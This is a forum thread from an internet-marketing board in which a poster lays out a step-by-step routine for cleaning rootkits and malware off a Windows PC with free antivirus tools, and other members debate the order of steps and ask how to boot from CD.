Get rid of Rootkits Scum Virus Trojans Guide

by daddykool

Posted: 12 years ago 21 replies

INTERNET MARKETING

We posted this in a few private messages & elsewhere and have noticed that there are a lot of Warriors with hacked / rootkit / scumware issues...

http://www.warriorforum.com/search.php?searchid=7825255

http://www.warriorforum.com/main-int...nt-hacked.html

>>>>>>>>

It is likely that you took the hack with you to your new host, it is also likely that the zebra code that is causing this in your / any files is from an injection on a theme / plugin / php file that has been modified before upload / download, both remotely or locally.

Stop uploading your backups / files / themes / plugins / content and sort the local issue out first.

Download and run these in this order:

Download these to a root folder on your C: drive for access later...

A: Kasperspy rootkit killa FREE - http://devbuilds.kaspersky-labs.com/..._rescue_10.iso

B: Avast FREE ver6 - Avast Free Antivirus - Reviews and free Avast Free Antivirus downloads at Download.com SAY NO TO ANY UPGRADES OR EXTRA $

C: Malbytes Malware FREE - http://files1.majorgeeks.com/files/8...mbam-setup.exe

D: Spybot FREE - http://dl.betanews.com/spybotsd162.exe

E: CCleaner FREE - http://download.piriform.com/ccsetup304.exe

1) Burn this .ISO to a cd, change your boot sequence to boot from CD, run the Kaspersky GUI, it will be slowish as it is installing a "safe level" between your BIOS and Windows platform, run it, making sure it is scanning ALL hard drives, it will take a while, but will find scum you never thought you had!

2) Restart your computer, changing the boot sequence back to boot from win hard drive, pressing F5 or F8 (depending on what version win you have) so PC boots into SAFE MODE without NETWORKING, if you miss it, quickly reset power and press F5 or F8 again until you catch it, once in safe mode, run windows program uninstaller and remove ALL or ANY anti virus / firewall software, even if you have paid for it! Then run (B) as above, install it and configure it to do a "scheduled scan on reboot" ensuring you again choose ALL HARD DRIVES, reboot the PC, it will load a BLACK DOS looking screen, that will scan (it might take a long time so maybe a chance to hand write some new IM articles on your niche!) everything, it should delete all the scum on its own, sometimes it will say "delete these" say yes to EVERYTHING it finds.

3) The PC will now be in full mode, with web connection, locate item (C) from your download folder, install it, run it and let it delete all it finds (it may do it for you) or delete everthing it finds. CLOSE PROGRAM

4) Install item (D) run it, choose update, let it update all the definitions it finds, restart Spybot, run it to check for any problems, delete all it finds.

5) Install item (E) run cleaner part of program FIRST, delete all it finds (it may do this for you) then run "clean registry" 2nd button on left, may take a while, then choose "fix all" when it asks do you want to back up reg items found, say NO, once finished close prog.

6) Now is the good bit, you should have succesfully found loads of SCUM and CRAP you thought would never be there, even 1 scum file can redownload scum progs back onto your drive as soon as you go online / run a snide program you may have downloaded on the sly, so DO A FULL WINDOWS back up to an external drive and then MAKE A NEW WIN RESTORE POINT and label it something like "CLEAN MARCH 2011" this way if you do ftp any crap down or up from your host / anywhere, you will have a clean PC to restore, without having to do all the above again!

7) Now once this is all done, choose update definitions on AVAST and run a full scan on your "FTP / WP / UPLOAD" folders on your local drive (the ones that have your work / sites / potential hacked files in) at least TWICE!

There we go, you can do some more than above, but this is what we have in one of our Jacked Guides for members and clients who we consult for and it works most of the time.

Now if you want to invest a good $30 odd, you really need this (direct link no hop) Prevx - Customer and Network Security and Breach Management it simply puts all other attempts to stop SCUM on your pc to shame, run it after all the above and you will still more than likely find even more stuff it will delete, the really CLEVER thing about this is the realtime power, nothing comes close!

Hope that helps you / everyone!

Flip

#guide #rid #rootkits #scum #trojans #virus

Ruka

12 years ago

This looks great DaddyKool, thank you for posting it.

Agree with you on the Prevx, I have it and love it.

Could I ask a few questions?

Will this sequence remove any nasties hidden away in files on my computer (eg. on a portable hard drive? Or if I had a back up of a website saved onto that hard drive, would it remove any viruses trojans etc?)

And - I don't mind spending cash on security solutions, just want the most secure environment.

Are you saying that the free options you mention above are the best, even if I don't mind paying?

Or if not, what are the products I should buy? (I have a broadband deal with McAfee installed for free on my machine, but am happy to purchase something better)

thanks so much

Thanks
1 reply

{{ DiscussionBoard.errors[3481336].message }}

daddykool

12 years ago

No Probs!

Originally Posted by chickenlittle

This looks great DaddyKool, thank you for posting it.

Agree with you on the Prevx, I have it and love it.

Best on the current market, other than buying a MAC!

Could I ask a few questions?

Will this sequence remove any nasties hidden away in files on my computer (eg. on a portable hard drive? Or if I had a back up of a website saved onto that hard drive, would it remove any viruses trojans etc?)

If you run in the rough order above, step 1 & 2 will actually check whatever devices, USB, External, Zip if you mark them to check, it has been suprizing as to what the boot CD will find!!! The clever thing about running step 2 after a rootkit scan with step 1 is IF you do have any SCUMware that reinstalls on a full boot... AVAST will find it as you have already cleaned the MBR (master boot records) of ALL storage devices

And - I don't mind spending cash on security solutions, just want the most secure environment.

Are you saying that the free options you mention above are the best, even if I don't mind paying?

Most of the PAID solutions in security / scanning / blahdy blah are using the EXACT same scripted engines in the FREE versions, yes you get a few singing and dancing extras, but seriously we have yet to NOT find scum using the methods from our guides. Must work well as we get paid to carry it out a lot, both locally and remotely

Or if not, what are the products I should buy? (I have a broadband deal with McAfee installed for free on my machine, but am happy to purchase something better)

In true IM warrior style we could say ALL of them! But no spend nothing, all the products are currently FREE, they all use the same updater engine for definitions, BUT would recommmend a donation for the full version of Malbytes as it rocks and works well!

thanks so much

More than welcome, let us know what the sequence finds on your machines, it will trust us! One client who had spent about $1200 on software and hardware protection ran just Ccleaner & the Rootkit Boot CD and found 143 SERIOUS hidden infections! The worst offender in all this is crappy social sites and links on the fanpages, they lead to driveby downloads that reside until needed by the h4cker to start "funny stuff" on your dsl line!

What OS you running?

Thanks

Signature

LAUNCHING VERY SOON > PRE-REGISTER NOW FOR A WSO THAT EVERY WARRIOR NEW & OLD CAN MAKE $$$ FROM! LIMITED PRE-LAUNCH SPACES - PM or email: JVSuperstars@gmx.com TO RESERVE A PLACE & LOCK IN A SUPER LOW LIFETIME PRICE! *** NEVER TO BE REPEATED PRICE ONLY AVAILABLE ON THE WARRIOR FORUM & OUR VERIFIED JV AFFILIATE PROVIDERS! ***

{{ DiscussionBoard.errors[3481479].message }}

Ruka 12 years ago

This is great. I am going to scan my PC and my laptop with your instructions. At last I have a workable plan to fix any underlying issues - thank you thank you

I am running Windows Vista on both of them. McAfee on both of them.

So, to be clear, shall I just remove McAfee from my systems altogether, or shall I leave it on?

And I have Spy Sweeper from Webroot, I find it's good for flagging up websites that are possibly harmful. Should I leave this on or should I remove it?

And - will Avast become my main anti-virus software after completing your instructions - should I schedule a weekly scan with it?
- Thanks
{{ DiscussionBoard.errors[3481516].message }}

Floyd Fisher

12 years ago

Daddykool:

Your guide violates the first rule of virus safety.

Never download...let alone run...an antivirus program to an infected machine!

The reason is simple....whatever you are infected with will simply infect the antivirus you download...continuing the cycle.

If you are going to download said utilities...find a known clean machine...and download and burn to a CD from there.

Also, I wouldn't even bother doing this until after I attempted to detect the problems using an online virus scanner. My steps:

1. Do an online scan first.
2. Follow this guide....except do the download and burn from a known clean machine.
3. Self detection using known symptoms (written down with paper and pencil...and pay close attention) run through a search engine like google.

You can change steps two and three as you feel like it, but always do step one first...and save yourself some pain.

Thanks
1 reply

{{ DiscussionBoard.errors[3481623].message }}

daddykool

12 years ago

Originally Posted by Floyd Fisher

Thanks for the input there Floyd, but there are no rules when it comes to Scumware & viruses, keep in mind most viruses are harmless GUI injectors and it is the rootkits and drivebys that cause the scumware!

As you can see the first step is NOT online and is the ONLY way apart from formating or a new drive to actually getting rid of todays scumware in the right order to retain your precious info.

Yes by all means run an online scan after steps 1 & 2, anything before is wasted time

Being online only hightens the chances of infection / drivebys / reinjection, most online scanners do not even scope the bytes on the MBR, hence you cannot find them, thus you go back online after you think "hey I am all nice and clean" and BAM, KERPOW, KERCHANG, you are back where you started.

The GUI that the rootkit CD / USB uses is Linux based, hence NO boot sectors, no master boot records, no cmos or onboard chip injections. We have not had one single client who has run just some of the guide, not find some form of scum, even on some safe sandbox machines running win OS from a CD/DVD have been highlighted with Scum!

The boot cd is ha5h protected you cannot burn anything else on to it from the ISO as the footprint when booting will not allow it to run when it matches the length of the bytes

Thanks again Flyod, love the suggestion of a pen and paper, just remind all the n00bs what are they again Bud!

Thanks
1 reply

Signature

{{ DiscussionBoard.errors[3481722].message }}

Floyd Fisher

12 years ago

Originally Posted by daddykool

Sorry, but I have to respectfully disagree here.

Your approach to this is like playing russian roulette....do you really want to take that chance the malware won't infect the antivirus you are downloading?

Not me pal....I don't care if the chances are one in a billion...that's a lottery I don't need a chance at winning....because in this case, winning flat out sucks.

And the reason I say do an online scan first is simple: My approach to troubleshooting and repair has always involved doing the simple stuff first, then going deeper only as necessary. I don't know about you, but my time is kinda important to me...and every second I'm not wasting chasing a computer nasty is a second I can turn to doing something much more important...like making money.

[ 1 ] Thanks

{{ DiscussionBoard.errors[3481965].message }}

ecdavis

12 years ago

Hi. I apologize, but I have a very basic question: In step 1 above, how do you change the boot sequence to boot from a cd or does this happen automatically when you insert the cd?

Thanks
1 reply

{{ DiscussionBoard.errors[3482170].message }}

Floyd Fisher

12 years ago

Originally Posted by ecdavis

Hi. I apologize, but I have a very basic question: In step 1 above, how do you change the boot sequence to boot from a cd or does this happen automatically when you insert the cd?

That is a switch you must do through the bios.

When you first turn your computer on, just hit F10 until you get to the bios screen.

Thanks

{{ DiscussionBoard.errors[3482701].message }}

daddykool 12 years ago

Thats why we do it this way round, never had a clients machine / server reinfected or reinjected either.

Get where you going Floyd, but as we stated, this is an offline answer to an online problem, there is no chance of infection from step 1&2 as you are not either online or in a win OS enviroment, once you get into step 3 then an online scan is worth the time, but as said the engine is the same.

We got an email from a warrior and have asked them to post what they did if they want to, but they found 5 rootkits and 2 MBR password injectors, just on one laptop! So glad its helping.

Guys, mixup our notes, with Flyods and you will have a clean machine one way or the other :-)

Bios may also be activated by F1 / F2 / F8 or as Floyd has stated F10, once in just change your boot sequence from your hard drive to CD or DVD device, you can even disable the hard drive boot sequence to make super sure the boot record is not accessed in anyway

Time is defo money, but to us we have lots of time bud!
- Thanks
Signature

LAUNCHING VERY SOON > PRE-REGISTER NOW FOR A WSO THAT EVERY WARRIOR NEW & OLD CAN MAKE $$$ FROM! LIMITED PRE-LAUNCH SPACES - PM or email: JVSuperstars@gmx.com TO RESERVE A PLACE & LOCK IN A SUPER LOW LIFETIME PRICE! *** NEVER TO BE REPEATED PRICE ONLY AVAILABLE ON THE WARRIOR FORUM & OUR VERIFIED JV AFFILIATE PROVIDERS! ***
{{ DiscussionBoard.errors[3482939].message }}

ecdavis

12 years ago

Floyd and Flip,

Thank you. So I start up the computer, hit F10 until I get to the bios screen and then change boot sequence. After I change the boot sequence to I then insert the cd, or do I shut down and then re-start with cd in drive?

Evan

Thanks
1 reply

{{ DiscussionBoard.errors[3483208].message }}

Floyd Fisher

12 years ago

Originally Posted by ecdavis

Just stick the cd into the drive, and navigate through the bios to the option 'save settings and reboot'...and use that.

Thanks

{{ DiscussionBoard.errors[3483938].message }}

ecdavis 12 years ago

Floyd,

Thank you. Got it!

Evan
- Thanks
- 1 reply
{{ DiscussionBoard.errors[3484045].message }}
- daddykool 12 years ago
  
  Once the boot cd starts evan, you will see a graphical user interface start up, it will take a while, but its roughly the same as an early version of windows or the playstation 3 type panel, it will ask you what drives you want to scan, let it do its thing and then move onto step 2
  
  Thanks
  
  Signature
  
  LAUNCHING VERY SOON > PRE-REGISTER NOW FOR A WSO THAT EVERY WARRIOR NEW & OLD CAN MAKE $$$ FROM! LIMITED PRE-LAUNCH SPACES - PM or email: JVSuperstars@gmx.com TO RESERVE A PLACE & LOCK IN A SUPER LOW LIFETIME PRICE! *** NEVER TO BE REPEATED PRICE ONLY AVAILABLE ON THE WARRIOR FORUM & OUR VERIFIED JV AFFILIATE PROVIDERS! ***
  
  {{ DiscussionBoard.errors[3485609].message }}
ecdavis 12 years ago

Flip,

Thank you. This really helps. I now feel confident that I can do this. Normally this sort of thing causes my hair to ignite.
- Thanks
- 1 reply
{{ DiscussionBoard.errors[3487888].message }}
- daddykool 12 years ago
  
  Originally Posted by ecdavis
  
  Flip,
  
  Thank you. This really helps. I now feel confident that I can do this. Normally this sort of thing causes my hair to ignite.
  
  The hair remark had me in stitches Buddy!
  
  Imagine a virus / rootkit that when you delete it your hair catches light! Is that the future in scumware lol
  
  Glad it helps, if you feel in control of your PC, your in control of your IMing
  
  Thanks
  
  Signature
  
  LAUNCHING VERY SOON > PRE-REGISTER NOW FOR A WSO THAT EVERY WARRIOR NEW & OLD CAN MAKE $$$ FROM! LIMITED PRE-LAUNCH SPACES - PM or email: JVSuperstars@gmx.com TO RESERVE A PLACE & LOCK IN A SUPER LOW LIFETIME PRICE! *** NEVER TO BE REPEATED PRICE ONLY AVAILABLE ON THE WARRIOR FORUM & OUR VERIFIED JV AFFILIATE PROVIDERS! ***
  
  {{ DiscussionBoard.errors[3487947].message }}
daddykool 12 years ago

NOTE:

When you start step 1 on the rough guide, you are using a boot CD that has got nothing to do with the crappy old microsoft full of problems windows operating system! It is a linux gentoo built cd that completely ignores any windows installs on any hard drives attached at the time of boot, this way it gets into searching and scanning the actual drives without your existing viruses / rootkits / malware / blahdy blah problems that exist on most windows machines (without the owner even knowing!)

I have had some emails with requests to help outside of WF with sorting, what sounds like some very serious rootkit and trojan issues, on some by the info supplied they have even been suckered into being in a botnet (check wiki if you do not know what it is) I can help but please follow the guide above, print it out and download everything you need to your root C: drive and you can do it for FREE!
- Thanks
Signature

LAUNCHING VERY SOON > PRE-REGISTER NOW FOR A WSO THAT EVERY WARRIOR NEW & OLD CAN MAKE $$$ FROM! LIMITED PRE-LAUNCH SPACES - PM or email: JVSuperstars@gmx.com TO RESERVE A PLACE & LOCK IN A SUPER LOW LIFETIME PRICE! *** NEVER TO BE REPEATED PRICE ONLY AVAILABLE ON THE WARRIOR FORUM & OUR VERIFIED JV AFFILIATE PROVIDERS! ***
{{ DiscussionBoard.errors[3494976].message }}

Steve Faber

12 years ago

Originally Posted by daddykool

I use B,C, and D on a regular basis and I agree, it's a great combination. Thanks for the info, it's only too bad that we need any of it!

[ 1 ] Thanks

Signature

For Killer Marketing Tips that Will Grow Your Business Follow Me on Twitter Now
After all, you're probably following a few hundred people already that aren't doing squat for you.....

{{ DiscussionBoard.errors[3495007].message }}

daddykool 12 years ago

Great to hear its helped even though you have them and you are so right when you say its too bad they are needed LOL

Its either that or go to the dark side... buy a MAC!
- Thanks
- 1 reply
Signature

LAUNCHING VERY SOON > PRE-REGISTER NOW FOR A WSO THAT EVERY WARRIOR NEW & OLD CAN MAKE $$$ FROM! LIMITED PRE-LAUNCH SPACES - PM or email: JVSuperstars@gmx.com TO RESERVE A PLACE & LOCK IN A SUPER LOW LIFETIME PRICE! *** NEVER TO BE REPEATED PRICE ONLY AVAILABLE ON THE WARRIOR FORUM & OUR VERIFIED JV AFFILIATE PROVIDERS! ***
{{ DiscussionBoard.errors[3500215].message }}
- olamilekan2 12 years ago
  
  Daddykool, Thanks for this great post. Can u help me here, My PC got infected with a Trojan, then use SuperAntiSpam software to remove it, But when i want to run some programs with .exe on my PC, i can not, and this only happens after i have done the Trojan removal. What do u suggest i can do.
  
  Thank u in advance
  
  Moruf
  
  Thanks
  
  Signature
  Morando Stores
  
  {{ DiscussionBoard.errors[3606807].message }}
daddykool 12 years ago

Do not run anything SuperAnti anything!!! Most call to software platforms are littered with Malware/Trojans/Rootkits and even Master boot makers!

Run the steps, exactally as above and it will get rid of ALL the crap!

In step one you are not actually using your WIN OS in anyway, this is the only TRUE way to get shot of all the crap and scumware, apart from running a Linux machine!!!!

Let us know how you get on!
- Thanks
- 1 reply
Signature

LAUNCHING VERY SOON > PRE-REGISTER NOW FOR A WSO THAT EVERY WARRIOR NEW & OLD CAN MAKE $$$ FROM! LIMITED PRE-LAUNCH SPACES - PM or email: JVSuperstars@gmx.com TO RESERVE A PLACE & LOCK IN A SUPER LOW LIFETIME PRICE! *** NEVER TO BE REPEATED PRICE ONLY AVAILABLE ON THE WARRIOR FORUM & OUR VERIFIED JV AFFILIATE PROVIDERS! ***
{{ DiscussionBoard.errors[3632317].message }}
- pctutor 12 years ago
  
  (Daddykool - thanks for your kind offer to have me mention my guide here!)
  
  I am a computer tech, and I get calls pretty regularly from people who are in a panic about a virus or spyware that just popped up on their screen. I have put together a step-by-step guide (including lots of screenshots) of the process I use to get rid of these annoyances. This is paint-by-number easy in most cases.
  
  Check it out here. The price is going up this weekend. At some point it will be a WSO but not sure exactly when.
  
  Stay safe everyone -
  
  Scott
  
  Thanks
  
  Signature
  Computer repair in Clearwater, Florida
  FREE GUIDE: PC Lockdown: How to Keep Your Computer and Data SECURE
  
  {{ DiscussionBoard.errors[3669635].message }}

Get rid of Rootkits Scum Virus Trojans Guide

Trending Topics

Is it okay to tag my clients' business names on LinkedIn?

Melbourne International Flower Show 2023

Where to find brokers / introducers?

How can I find a designer developer to create a great landing page for my course offer?

Bard VS ChatGPT